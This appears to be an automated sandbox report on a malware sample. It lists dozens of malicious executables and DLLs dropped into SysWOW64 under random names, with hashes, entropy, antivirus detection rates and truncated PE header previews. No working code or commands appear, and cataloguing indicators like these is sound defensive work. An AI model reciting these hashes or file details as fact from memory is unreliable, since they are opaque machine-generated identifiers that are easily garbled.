                          SHA-512:62AA454531649CCE0235E34336D33086CB978F7F0EEF0AE5B65A977D3E27C0441818EE9DEAACFD839F15C8C51D9C60DA7082FB2B9343C04124F867C280E73F36
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Dnhmjm32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.023176639024364
                          Encrypted:false
                          SSDEEP:3072:Syp08rNuMd594CREXdXNKT1ntPG9poDrFDHZtOgl:SgRdz3CN9Otopg5tTl
                          MD5:E467DF0B06CAE41308F8F0A6E1F35FBA
                          SHA1:96A89551C1161416FFD51644407E4E0839E61E06
                          SHA-256:8D1CBE74AF1F0E8D28029D5B9F42CD4AA0B93948E8AF1D00C61EF46EB3A416C2
                          SHA-512:04A0B82DA0148758FF2514FCEA27D2B7BCB42557CC78A952F388BEE2C3DE86C4F9D94A97F12CADD9D3E5E545783CA6B22CB387520AFCD60AEC070D4245FFE8D2
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Camgpi32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.97577146093803
                          Encrypted:false
                          SSDEEP:3072:A7EspPCREXdXNKT1ntPG9poDrFDHZtOgl:A75KCN9Otopg5tTl
                          MD5:8A37BEE9F75CA0545946D3034A19B27A
                          SHA1:92DD63ED29DC0AD8AE17C9D921D0C83210973907
                          SHA-256:0A6191833E1D436234207A35DCF112C24D56CDE59B83F1F2AB5AB6738FE7E1E0
                          SHA-512:18E06AFEEC694E90E32A3E3EE762BD8BF08EE7D18F9C31001E829F1CBA88D538089F836532434F26CC20D7EE23349FA1A897F72E672CC1BC559D12EAA0D86AD6
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Process:C:\Windows\SysWOW64\Dmfdkj32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.027136963901096
                          Encrypted:false
                          SSDEEP:3072:LmGGDZZP3bxvCREXdXNKT1ntPG9poDrFDHZtOgl:LmlZ/bxqCN9Otopg5tTl
                          MD5:305D22424B3635688BD806671F6F8A9C
                          SHA1:3B535340C1EBD37004465322558CBD49E5C5DFA0
                          SHA-256:F008E17CEA08771A0FF9C02B1FCDDDEABF6A4D64B88BECCA3C0D7AA9C2986237
                          SHA-512:F6E6E5CAD5F62210620BB94B8CAB57BAA7C216B05C151C2811785352C36FBD9F12DEBD4BF46995227B092E4702A4785DB99448968C2569F87430BC2C260270B8
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Process:C:\Windows\SysWOW64\Dfcboo32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.965251870706293
                          Encrypted:false
                          SSDEEP:3072:Es1F6tr/7oSQvP50uEYfkN8CREXdXNKT1ntPG9poDrFDHZtOgl:EqSQvPauEYfkNzCN9Otopg5tTl
                          MD5:4396DFC06DB43385A7F834F79F6CA36B
                          SHA1:04A9D073275A2FEC582939AAFF0910172A409049
                          SHA-256:6380D7FC16CA2E94D74D881882DD6E6DD0F869D2D1D310E18CCB859DB0C07C3E
                          SHA-512:9C25566E71A1CE453F961DF16A1FEE0E77AD0D9C1DDF82BC09448D7B0055F0010CE998D570FF8276EAD242EDCB95D7B39F37D0422E8C57040D9ADD2B6FC011A8
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Process:C:\Windows\SysWOW64\Emogai32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.99262873088875
                          Encrypted:false
                          SSDEEP:3072:EAQEBDhCdxIrCN+l0Av+DCREXdXNKT1ntPG9poDrFDHZtOgl:BQuCdxIrCN+ibWCN9Otopg5tTl
                          MD5:B024F2548F4F6ADC9F3DCD68E53CB2CC
                          SHA1:D4C3B11FBBDD3C92C1EF7239E2F8A52C0393E8A5
                          SHA-256:7DCF65D4231EA6F0A111E9440E2A30B2678655CB5C612B98EEEC9640EE74BF6C
                          SHA-512:32DC109B6AE1D31F3D78BD27D7612D729EB499E9E5F7B183E44D95F522FB56FAEF4BE0B495FC98938D4A3393014FA0A2814121C8F795A5CFA3C1CA6572B2403D
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Process:C:\Windows\SysWOW64\Bnnampcf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8857372746895487
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU102B+BDq9J5SV3DY:CSVVEPozmB7gB+FqX5S1D
                          MD5:64A413D73C3924CE3F67385E541D3D40
                          SHA1:9EC914148745656C5AC81315E379F4A2A84824B8
                          SHA-256:534332DC755FE82DA87853D7F5F4D7A1CBFBA2F876E68B33F68E80DD7C0A8675
                          SHA-512:FD9E88445C36348DD67D78AFDC4CA53E295965D1E241D9592084192B012E05E04997A92310D89611EE2463FFAF9FCC79E01CEFA7CD613B595CF5D9090F4A1154
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Dnhmjm32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885838975854523
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10XB+BDq9J5SV3DY:CSVVEPozmB7VB+FqX5S1D
                          MD5:74C686D7A0DEAEDBCFE8565A4E85427B
                          SHA1:B40FAA2D882CFB324228B65680837E812D5C4735
                          SHA-256:A741D9607B1026092946386DF892CCE99ECBE4814B70D733A5E5B0A6278864CA
                          SHA-512:74146B493FE8C119E3E4315EA9C4B1EE938A149172667CA9AE9BC120996272A78B95D70AB406FB587C2EFCA8F9EE025A9F8C3E2ADA4B440B3022B0AE22F4F4E4
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 96%
                          Process:C:\Windows\SysWOW64\Edgbhcim.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.033008905238589
                          Encrypted:false
                          SSDEEP:3072:sEpwPkI7+NCKbCREXdXNKT1ntPG9poDrFDHZtOgl:sESPf8OCN9Otopg5tTl
                          MD5:E5B571BCF3D5D371B03E73AAAE92245B
                          SHA1:D2565DE79EED30E023FFC4E615BFE09E43ED2ADA
                          SHA-256:C637B70B49CEEF5475AC79C049D02166418712F00DE75D60D3FA91ED84908308
                          SHA-512:BA8BCD2C2421B0F01A3273E2EB1D6810A83916BE5CAD9063FD84D59627E72CE8685E196C1647827176AEAFE05DAD94C44F62D1920414756E88405BFE85A64080
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Process:C:\Windows\SysWOW64\Efgkjnfn.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.051974357251368
                          Encrypted:false
                          SSDEEP:3072:7Bl3sqC3/8dCqlCREXdXNKT1ntPG9poDrFDHZtOgl:7FGgC3CN9Otopg5tTl
                          MD5:B8C0A2511B4FA693AE579E90FCE526AD
                          SHA1:015FEBAF7E5710A37A10EBCE69A792B739D09C91
                          SHA-256:192EE5895D615BE428D320D3B4B5861B5489F910B12738FD587DE10FD214A2C5
                          SHA-512:03B7E6B85C309DF9C92EB9B134430B42ABE0E2F753B7194E51825CE3E6342F5F31B20DD01C5EE0B84B9F041E9CE330BCFA74A8F968E4236F86CFE51DA93B09B3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Process:C:\Windows\SysWOW64\Baagdk32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.886053484661704
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU102B+BDq9J5SV3DY:CSVVEPozmB7AB+FqX5S1D
                          MD5:267296DC4E8E26C9C464483ED9D5EBB3
                          SHA1:A09BB3543AD908C03E2CFF291BD6D1D3896FCB43
                          SHA-256:FE4EB7D222801DD086D65AD0195DA1CAA63A21E4F613B34A2F207D9DAB6872D5
                          SHA-512:A41BAB7CE1ECD14CFA22C861E154DAD43CF995F2771C039F8D21EB4BF0D080103B6411DF6F56792ECCD887A9182366E9754878820090932442EEC45751C6D63E
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Process:C:\Windows\SysWOW64\Oceoll32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8858298950249166
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10xGB+BDq9J5SV3DY:CSVVEPozmB7DGB+FqX5S1D
                          MD5:44D926DEBEAD25A648DD5229532DBD34
                          SHA1:8DBA12FE0FF2C57321D6A8ECD5A210A69B30A46C
                          SHA-256:5004AF82C247A517FAA0391FC20D2A437A2CDD99EE91FF7F150F07A6D1FD4D65
                          SHA-512:5C95796AF9C281C1F8C8DC98F8D29160AC23411FDA0FD74103AA9044731A4F215FFB54BD3DB5DFE610B2A136F6CDD42A820B338FE5CF0C7B6D772AA6ABAB74B9
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 93%
                          Process:C:\Windows\SysWOW64\Fhedeo32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.960181662781226
                          Encrypted:false
                          SSDEEP:3072:CISnyGkmx04CREXdXNKT1ntPG9poDrFDHZtOgl:CIsRkmi3CN9Otopg5tTl
                          MD5:635F3B50D2C2626B8575FD1AD6A4CE99
                          SHA1:9F86DAF6240E4EF1BB9F515B7E808A2D15D93DA1
                          SHA-256:42FC59938355F4920910960E27ECB6F7986CB1C9007F7A89254145DC9E8147F5
                          SHA-512:1DC5BCC7B9BFA07CBA6E475D88AA1EA72EB1ECD1EAC0DF6A55E8AD1AB44656BAB5D5DBEC39CD39F7E6F18CBDF48923EB2416EC221893F1AC39127E300C6BC503
                          Malicious:true
                          Process:C:\Windows\SysWOW64\Fkogfkdj.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.024420071206356
                          Encrypted:false
                          SSDEEP:3072:QsffHG9kLrqCREXdXNKT1ntPG9poDrFDHZtOgl:LfmefpCN9Otopg5tTl
                          MD5:03114EFDB305B36B603B7F89B84FE057
                          SHA1:43AD0D7FB62E39028A7EBC22C993EEFC96E32C9E
                          SHA-256:547095B2F635B2F38891955AE3E92A928E63ECEE2060B9B88E26A77C2D988269
                          SHA-512:985CE710C30A2E6FBE655154CAC9153410F4244302DE5369E79DA58848C694B85F4C81B672AAB58665D2EA81760DB5130D9E75C4889E3617CD4EB9DE53DC74FE
                          Malicious:true
                          Process:C:\Windows\SysWOW64\Ogjdllpi.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8858578920619133
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10nB+BDq9J5SV3DY:CSVVEPozmB7FB+FqX5S1D
                          MD5:0934A11C0BE2E4DABDF534C97A617593
                          SHA1:74A2D76FF4C1AD7D5503BF87F5F7248470743202
                          SHA-256:7691E5EE4366CFF257EC19093F1A43DA65C2182B488F3BE14A701555E1DAA649
                          SHA-512:F9CF9ABD7AC1E49B198B386353611CC801C351033713D6F184D65F7B3A6F99A11D4B0CEDA478A3387D23FED221B41CBB12BEB17E027942410EE29F909A00578A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 89%
                          Process:C:\Windows\SysWOW64\Eoappk32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.993528037685683
                          Encrypted:false
                          SSDEEP:3072:G64M1aY2HDWap/yCREXdXNKT1ntPG9poDrFDHZtOgl:5eWm/RCN9Otopg5tTl
                          MD5:151422544613301F6704413C52E381B0
                          SHA1:DBF85C801D3D0277CABA0EEE3F76375F38450FD0
                          SHA-256:C6CC3297F229EA9C5756227978840C7BBBDEE1C5636B19C501FD5739EF8E2204
                          SHA-512:1416D131630C2D8E928BAA5BFF7D6A68A9E6843620975443D8B64E8A62BCBD93A5A79A2100EC1736B3F78C3B5E84AA18990824E74329E3DA9A8925B116D8501D
                          Malicious:true
                          Process:C:\Windows\SysWOW64\Emogai32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885508762467327
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10yB+BDq9J5SV3DY:CSVVEPozmB7AB+FqX5S1D
                          MD5:DD9B2BDB74F86DE41DEAF7A26F5B324D
                          SHA1:E80E73D7B0273FAA255CD611325EC3A816890DFA
                          SHA-256:723F6DD1651EF84B927C16D8DA760C3F57E0C82A46EEC920A17865339F037EAE
                          SHA-512:290EB2AFC095CEF9149AE127F61C01A4CC247FF5752B71E79B81491E47B5542912C399475934072D18FD1974203B77D0DA9AA955E83EBBD5D39FF7E904462C73
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Process:C:\Windows\SysWOW64\Feidnc32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.043430484643041
                          Encrypted:false
                          SSDEEP:3072:NFutzrvxY4mcRPCREXdXNKT1ntPG9poDrFDHZtOgl:Iz7ICN9Otopg5tTl
                          MD5:1FC2CFC732D1C3E7577F946BB2663E80
                          SHA1:5CD38AE3745B1B07C69E42608A54A5C2CE46D2E7
                          SHA-256:F511E865F5B22BA348390F7F6F22E9EF4E82863F858190ECF47BB3B983F13E50
                          SHA-512:7A4F296864139512AD7620E57CA9FAA02B8E9D780699A278F41C2CE0C80D27344D27D0156214158D076932E80D3EC16382BDFD038DF8AA802B8D94B6508190EF
                          Malicious:true
                          Process:C:\Windows\SysWOW64\Bgibkegc.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.88604670303652
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10SB+BDq9J5SV3DY:CSVVEPozmB74B+FqX5S1D
                          MD5:4AC72E51040613B899E1383DBC52D030
                          SHA1:A93C2A2EFE25BE4B41EECC4D44F1220DB2C65342
                          SHA-256:9413A58BD46048350C722B0AE4241619210ADE1A08998277FA521F76161ED970
                          SHA-512:B7F4CD2AC9672C77BE72E95FD6EC0F21D4523072C9DE03214640EBF85BA54DA9E3CF631517F5C4B443F098A2515A3214F0E62ED793D648264870EEDB00B54787
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 91%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Efgkjnfn.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885572674896782
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10GB+BDq9J5SV3DY:CSVVEPozmB7wB+FqX5S1D
                          MD5:5A64C90933C6B63A4BEACD497AFFB868
                          SHA1:749E648BE4B9F66AA7D05E4BA6FF1F91B3A5A762
                          SHA-256:32B2F8923DCFAF6AE7BBC9503046A9F4170DA3EB4F9626264EF71116ADC42C5E
                          SHA-512:9E6EB20C45D6E0F0E26BC4809392983A5D245E7DF27D252B26DA5820B76DD0D4570E25A1EF51000C960041DDB103E516AB319C6C0000D8B1F5BA8451F9B02E59
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Foaigifk.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.017206911109038
                          Encrypted:false
                          SSDEEP:3072:i4eIF2e9kzg8qUgCREXdXNKT1ntPG9poDrFDHZtOgl:iVIF2RzmUfCN9Otopg5tTl
                          MD5:7C0C736EA42E96EFCBA80D317BD1A29B
                          SHA1:F83108C8A93C35896B4BDC1A74A8B83B2C07D463
                          SHA-256:E35DB3634FD3CAF2178AFA66E823055E26E7F0C82F4D6127AA50790D78890B47
                          SHA-512:3E09925DC06F43F9A367476A701CEDC257CE10EE9C9D6CC16D1CE11E26081E148376FE5B54E3E620B101CD483B9D53235B0FABEDD31D7C35C37BCB322E51CC07
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Feidnc32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8864778178380104
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10RB+BDq9J5SV3DY:CSVVEPozmB7fB+FqX5S1D
                          MD5:8B82F1EFBB2C31B67DA32AA4BC5E6970
                          SHA1:F54F211D1E14D12415F6DA8C2E691F6ABD91AFDD
                          SHA-256:AF3C4D3331D2407E51597AF2EADB093EDC581DAD8462CC667C3333E7AA7A993F
                          SHA-512:404570256B70B7784F2B2C25816D6694F81EAF33C11CF5C008AC647B07C144E900633B0C43285AB69779F32B5A996A13D561D25DB780A7E870E9FEEEDA8DC019
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 91%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Opbieagi.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8861450990154975
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU1053B+BDq9J5SV3DY:CSVVEPozmB7rB+FqX5S1D
                          MD5:991F572DAA7F3512471426098E125B18
                          SHA1:BFBFC2089E70760A99E9854E778DD1DD4417E64D
                          SHA-256:4830BC8285DDBBC91C0023BFD8735F0EBE832154B33B63EF0850640EA931EBC9
                          SHA-512:9980C3DEC7EB505C7DA6695D79D96A1F0C781851D7F4C89125323F84745CFCBDA0346CBB5441C0046559C963CB9F529E98221C60A48BE64C36D836F5764DE319
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 92%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Dmfdkj32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885564494396584
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10aB+BDq9J5SV3DY:CSVVEPozmB7cB+FqX5S1D
                          MD5:0D2D3CFFAD2A527E808B87FADC7913EF
                          SHA1:5363C5FFE5BD09231FBBE2C1AF0CD04BA624C3F6
                          SHA-256:D5762FBFFB75037FD96626E9C5BAD71E527CC0E5F42E341616742702DBC42E1F
                          SHA-512:E7035FB1CFAFFA5E18AD1A7824054C754D0D188C5DAC172DF0D996212B6D7BE619354B55239A83C44D2911214F3F68CEF332707C88100C14908A72E682A7F6D8
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Ceampi32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885243551552366
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU101kB+BDq9J5SV3DY:CSVVEPozmB7fkB+FqX5S1D
                          MD5:C65D8196AE09D571E0BCA6EF1DEE8DC6
                          SHA1:122441D02298668A31B09940E45B9CD0A6542672
                          SHA-256:D241C35C326199656DC164F2E11A93C9067CEED6D23157E8C87B7DC33819873C
                          SHA-512:D21E4AB5DFEEC6B6F74F66D02F26469E53016C5942B039E1B54DE35C6012B9904E0C4CE27F4B59217C4D3999BC28D5260BBCDB8A704D90A5C000B302728C1C39
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Camgpi32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8858637774811133
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU102B+BDq9J5SV3DY:CSVVEPozmB7EB+FqX5S1D
                          MD5:FBF9FB1321C4951A8B2D3EA609484E8A
                          SHA1:C02AB4F1EEF4BED492567A90813B0641BDA1C333
                          SHA-256:02833DCF979AEAC50ADC7522AB5A8957DFB339008F50AECEF4CE3F7F348EF6F9
                          SHA-512:D48FD5B4CE67862A5CFD6B633BD0E945C3B4B867202DC2E786EAF3830D1C4DB4B25AECE4D1D465626A780B1B9AC2A609AD2DF69738014E997B4D9D9B5B7E7B0D
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Cfnpmb32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885816997493956
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10MB+BDq9J5SV3DY:CSVVEPozmB7CB+FqX5S1D
                          MD5:DE7828FF0906BB747EC773C746D3348F
                          SHA1:671C2AAB21021CBF75A839CF8C467D20D0677663
                          SHA-256:7DCA31B36589E998E6B57E11DCF85A275A5C9B17F8136AD08B14E3FF2070B720
                          SHA-512:FE721D2CA4A5273176F58E8BA5FB004A85DA49D86B2624E514D326BAD1281716548AE8845E22D7DE904CE4034CEB40F4F094235BDB97470229D99D86B839587B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 88%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Ajkolbad.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8850555329354424
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10eUB+BDq9J5SV3DY:CSVVEPozmB7RB+FqX5S1D
                          MD5:FB0235D41A43088844FB9B0B5069BDDB
                          SHA1:B03B587C54E1E2E29ED1154552A3C3517E3BAB64
                          SHA-256:50C9367F164DD0D9A3776813ABE810C7569A389374B2FECF8DCF7C459BD34E55
                          SHA-512:224B245471D45C835B6F9458C0FA611C6428623B0795669BA0B07137BA0B4716F58EC80D9A1A6BE340F595E17876C23F3C1F94B76C675EF6EC6CDF87C6BD05F8
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 96%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Ccapffke.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8857049728382753
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10vB+BDq9J5SV3DY:CSVVEPozmB7tB+FqX5S1D
                          MD5:AA4C8909A7FA635B986B1A8A1957C92E
                          SHA1:D50A2CD9D2F97EBACBCA101612A6781CF666602D
                          SHA-256:96D940EF284DF959E4DAC46639032C81826C1D38175FB59FD9D17E9BB997C5CF
